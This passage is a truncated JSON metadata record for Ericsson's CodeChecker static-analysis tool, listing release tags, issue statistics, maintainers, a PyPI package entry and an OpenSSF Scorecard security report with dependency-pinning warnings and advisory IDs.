commit","published_at":"2016-08-30T10:06:53.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.5","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.5/manifests"},{"name":"v5.4","sha":"bcc8c663294739c3946e6cd147e0f98fa0e2d57f","kind":"commit","published_at":"2016-08-05T10:43:49.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.4","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.4/manifests"},{"name":"v5.3","sha":"902c6cf189d747faae5684c4f3f790224dde5eab","kind":"commit","published_at":"2016-04-14T15:55:10.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.3","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.3/manifests"},{"name":"5.2","sha":"13cd6b405ed50ed5865c486eda44bf7e7d52b929","kind":"commit","published_at":"2016-02-17T12:35:47.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/5.2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/5.2/manifests"},{"name":"v5.2","sha":"13cd6b405ed50ed5865c486eda44bf7e7d52b929","kind":"commit","published_at":"2016-02-17T12:35:47.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.2/manifests"},{"name":"v5.1","sha":"ab6c82930bde31e558ca20790df7a701e04ed7e6","kind":"commit","published_at":"2015-11-26T13:16:56.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.1/manifests"},{"name":"v5.0","sha":"5bb577a9c03bbe78317a4a57d20c0c1e3a3064d0","kind":"commit","published_at":"2015-11-11T10:02:45.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.0/manifests"},{"name":"v4.0","sha":"72075b4a94b791cee9f434ea5d06c702e2fce16d","kind":"commit","published_at":"2015-08-26T13:33:23.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v4.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v4.0/manifests"}]},"repo_metadata_updated_at":"2025-08-19T18:14:34.536Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":9.345852080216646,"dependent_packages_count":6.999148183520997,"stargazers_count":null,"forks_count":null,"average":8.172500131868823},"purl":"pkg:golang/github.com/ericsson/codechecker","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/ericsson/codechecker","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/ericsson/codechecker","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/ericsson/codechecker/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2025-08-10T06:58:09.855Z","issues_count":289,"pull_requests_count":576,"avg_time_to_close_issue":24131448.2,"avg_time_to_close_pull_request":3397393.635220126,"issues_closed_count":110,"pull_requests_closed_count":477,"pull_request_authors_count":72,"issue_authors_count":116,"avg_comments_per_issue":1.6678200692041523,"avg_comments_per_pull_request":0.7586805555555556,"merged_pull_requests_count":412,"bot_issues_count":0,"bot_pull_requests_count":59,"past_year_issues_count":89,"past_year_pull_requests_count":224,"past_year_avg_time_to_close_issue":3579611.04,"past_year_avg_time_to_close_pull_request":1482183.1176470588,"past_year_issues_closed_count":25,"past_year_pull_requests_closed_count":170,"past_year_pull_request_authors_count":37,"past_year_issue_authors_count":52,"past_year_avg_comments_per_issue":1.0337078651685394,"past_year_avg_comments_per_pull_request":0.5491071428571429,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":22,"past_year_merged_pull_requests_count":143,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/issues","maintainers":[{"login":"dkrupp","count":73,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dkrupp"},{"login":"vodorok","count":56,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vodorok"},{"login":"Szelethus","count":55,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Szelethus"},{"login":"whisperity","count":49,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/whisperity"},{"login":"cservakt","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cservakt"},{"login":"gamesh411","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gamesh411"},{"login":"gulyasgergely902","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gulyasgergely902"},{"login":"noraz31","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/noraz31"},{"login":"feyruzb","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/feyruzb"},{"login":"stt08","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/stt08"},{"login":"barnabasdomozi","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/barnabasdomozi"},{"login":"xb058t","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xb058t"},{"login":"csordasmarton","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/csordasmarton"}],"active_maintainers":[{"login":"dkrupp","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dkrupp"},{"login":"gulyasgergely902","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gulyasgergely902"},{"login":"gamesh411","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gamesh411"},{"login":"noraz31","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/noraz31"},{"login":"cservakt","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cservakt"},{"login":"feyruzb","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/feyruzb"},{"login":"barnabasdomozi","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/barnabasdomozi"},{"login":"xb058t","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xb058t"},{"login":"stt08","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/stt08"},{"login":"Szelethus","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Szelethus"},{"login":"whisperity","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/whisperity"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fericsson%2Fcodechecker/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fericsson%2Fcodechecker/version_numbers","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fericsson%2Fcodechecker/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fericsson%2Fcodechecker/related_packages","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":1954233,"maintainers_count":0,"namespaces_count":741771,"keywords_count":109320,"github":"golang","metadata":{"funded_packages_count":49342},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2025-09-08T05:47:38.872Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":2674737,"name":"codechecker-api-shared","ecosystem":"pypi","description":"Shared API stub types package for the CodeChecker API.","homepage":"https://github.com/Ericsson/codechecker","licenses":"apache-2.0","normalized_licenses":["Apache-2.0"],"repository_url":"https://github.com/Ericsson/codechecker","keywords_array":["codechecker","thrift","api","library"],"namespace":null,"versions_count":60,"first_release_published_at":"2020-02-17T16:19:49.000Z","latest_release_published_at":"2021-01-28T10:54:41.000Z","latest_release_number":"6.39.0","last_synced_at":"2025-08-19T18:10:27.469Z","created_at":"2022-04-10T10:23:46.255Z","updated_at":"2025-08-19T18:14:34.538Z","registry_url":"https://pypi.org/project/codechecker-api-shared/","install_command":"pip install codechecker-api-shared --index-url https://pypi.org/simple","documentation_url":"https://codechecker-api-shared.readthedocs.io/","metadata":{"funding":null,"documentation":null,"classifiers":["Development Status :: 3 - Alpha","Intended Audience :: Developers","Programming Language :: Python :: 2","Programming Language :: Python :: 3"],"normalized_name":"codechecker-api-shared","project_status":null},"repo_metadata":{"id":37431651,"uuid":"37459110","full_name":"Ericsson/codechecker","owner":"Ericsson","description":"CodeChecker is an analyzer tooling, defect database and viewer extension for static and dynamic analyzer tools.","archived":false,"fork":false,"pushed_at":"2025-08-19T16:09:45.000Z","size":44800,"stargazers_count":2443,"open_issues_count":456,"forks_count":424,"subscribers_count":52,"default_branch":"master","last_synced_at":"2025-08-19T17:45:59.071Z","etag":null,"topics":["analysis","c","clang","clang-tidy","codechecker","cpp","database","defects","docker","linux","llvm","macosx","objective-c","results-viewer","static-analysis","static-analyzer","static-analyzers","vue"],"latest_commit_sha":null,"homepage":"https://codechecker.readthedocs.io","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Ericsson.png","metadata":{"files":{"readme":"docs/README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE.TXT","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":"docs/supported_code_analyzers.md","governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2015-06-15T10:38:51.000Z","updated_at":"2025-08-19T16:09:49.000Z","dependencies_parsed_at":"2023-09-29T11:42:30.441Z","dependency_job_id":"50b5428a-2bdc-4def-b0a6-a46baec9079d","html_url":"https://github.com/Ericsson/codechecker","commit_stats":{"total_commits":3749,"total_committers":127,"mean_commits":"29.519685039370078","dds":0.6054947986129635,"last_synced_commit":"4234fb7b91d07681ee032862fbb096197d5f104a"},"previous_names":[],"tags_count":90,"template":false,"template_full_name":null,"purl":"pkg:github/Ericsson/codechecker","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Ericsson","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/sbom","scorecard":{"id":46490,"data":{"date":"2025-08-11","repo":{"name":"github.com/Ericsson/codechecker","commit":"49a939ab451d1b2a06553f17c4635a306527c33a"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.9,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 4 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/codechecker_master_analysis.yml:1","Warn: no topLevel permission defined: .github/workflows/codechecker_pr_analysis.yml:1","Info: topLevel permissions set to 'read-all': .github/workflows/config_coverage.yml:24","Info: topLevel permissions set to 'read-all': .github/workflows/docker.yml:8","Info: topLevel permissions set to 'read-all': .github/workflows/pypi.yml:9","Info: topLevel permissions set to 'read-all': .github/workflows/snap.yml:8","Info: topLevel permissions set to 'read-all': .github/workflows/test.yml:6","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.TXT:0","Info: FSF or OSI recognized license: Apache License 2.0: LICENSE.TXT:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/docker.yml:11"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codechecker_master_analysis.yml:17: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/codechecker_master_analysis.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codechecker_master_analysis.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/codechecker_master_analysis.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codechecker_pr_analysis.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/codechecker_pr_analysis.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codechecker_pr_analysis.yml:17: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/codechecker_pr_analysis.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/config_coverage.yml:31: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/config_coverage.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/config_coverage.yml:32: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/config_coverage.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/config_coverage.yml:51: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/config_coverage.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/docker.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/docker.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/docker.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/docker.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/docker.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/docker.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/docker.yml:31: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/docker.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pypi.yml:17: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/pypi.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pypi.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/pypi.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pypi.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/pypi.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pypi.yml:47: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/pypi.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pypi.yml:64: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/pypi.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pypi.yml:68: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/pypi.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/snap.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/snap.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/snap.yml:17: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/snap.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/snap.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/snap.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:91: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:92: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:117: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:154: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:199: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: containerImage not pinned by hash: docker/Dockerfile.test.sqlite.clang11.bionic:1: pin your Docker image by updating ubuntu:18.04 to ubuntu:18.04@sha256:152dc042452c496007f07ca9127571cb9c29697f42acbfad72324b2bb2e43c98","Warn: containerImage not pinned by hash: docker/Dockerfile.test.sqlite.clang11.xenial:1: pin your Docker image by updating ubuntu:16.04 to ubuntu:16.04@sha256:1f1a2d56de1d604801a9671f301190704c25d604a416f59e03c04f5c6ffee0d6","Warn: containerImage not pinned by hash: docker/thrift/Dockerfile.thrift.noble:1: pin your Docker image by updating ubuntu:24.04 to ubuntu:24.04@sha256:a08e551cb33850e4740772b38217fc1796a66da2506d312abe51acda354ff061","Warn: containerImage not pinned by hash: web/docker/Dockerfile:5","Warn: containerImage not pinned by hash: web/docker/Dockerfile:43: pin your Docker image by updating python:3.10.16-slim-bullseye to python:3.10.16-slim-bullseye@sha256:c758f6d42a79466e943350a2c5273a09767bddc16a81d381ed21675a382205ee","Warn: pipCommand not pinned by hash: docker/Dockerfile.test.sqlite.clang11.bionic:3-29","Warn: pipCommand not pinned by hash: docker/Dockerfile.test.sqlite.clang11.bionic:3-29","Warn: pipCommand not pinned by hash: docker/Dockerfile.test.sqlite.clang11.xenial:3-33","Warn: pipCommand not pinned by hash: docker/Dockerfile.test.sqlite.clang11.xenial:3-33","Warn: downloadThenRun not pinned by hash: web/docker/Dockerfile:16-23","Warn: pipCommand not pinned by hash: web/docker/Dockerfile:91-119","Warn: pipCommand not pinned by hash: web/docker/Dockerfile:91-119","Warn: pipCommand not pinned by hash: web/docker/Dockerfile:91-119","Warn: pipCommand not pinned by hash: web/docker/Dockerfile:91-119","Warn: pipCommand not pinned by hash: .github/workflows/codechecker_master_analysis.yml:23","Warn: pipCommand not pinned by hash: .github/workflows/codechecker_master_analysis.yml:24","Warn: pipCommand not pinned by hash: .github/workflows/codechecker_pr_analysis.yml:22","Warn: pipCommand not pinned by hash: .github/workflows/codechecker_pr_analysis.yml:23","Warn: pipCommand not pinned by hash: .github/workflows/pypi.yml:103","Warn: pipCommand not pinned by hash: .github/workflows/pypi.yml:104","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:51","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:58","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:64","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:70","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:77","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:83","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:125","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:177","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:217","Info:   0 out of  28 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   6 third-party GitHubAction dependencies pinned","Info:   0 out of   5 containerImage dependencies pinned","Info:   0 out of  24 pipCommand dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":0,"reason":"24 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: PYSEC-2025-49 / GHSA-5rjg-fvgr-3xxf","Warn: Project is vulnerable to: GHSA-9hjg-9r4m-mvj7","Warn: Project is vulnerable to: GHSA-3ww4-gg4f-jr7f","Warn: Project is vulnerable to: PYSEC-2024-225 / GHSA-6vqw-3v5j-54x4","Warn: Project is vulnerable to: GHSA-9v9h-cgj8-h64p","Warn: Project is vulnerable to: GHSA-h4gh-qq45-vh27","Warn: Project is vulnerable to: PYSEC-2023-254 / GHSA-jfhm-5ghh-2f97","Warn: Project is vulnerable to: GHSA-v6h2-p8h4-qcjw","Warn: Project is vulnerable to: GHSA-gxpj-cx7g-858c","Warn: Project is vulnerable to: GHSA-2j2x-2gpw-g8fm","Warn: Project is vulnerable to: GHSA-fjxv-7rqg-78g4","Warn: Project is vulnerable to: GHSA-2p57-rm9w-gvfp","Warn: Project is vulnerable to: GHSA-f8q6-p94x-37v3","Warn: Project is vulnerable to: GHSA-76c9-3jph-rj3q","Warn: Project is vulnerable to: GHSA-7fh5-64p2-3v2j","Warn: Project is vulnerable to: GHSA-p8p7-x288-28g6","Warn: Project is vulnerable to: GHSA-f5x3-32g6-xq36","Warn: Project is vulnerable to: 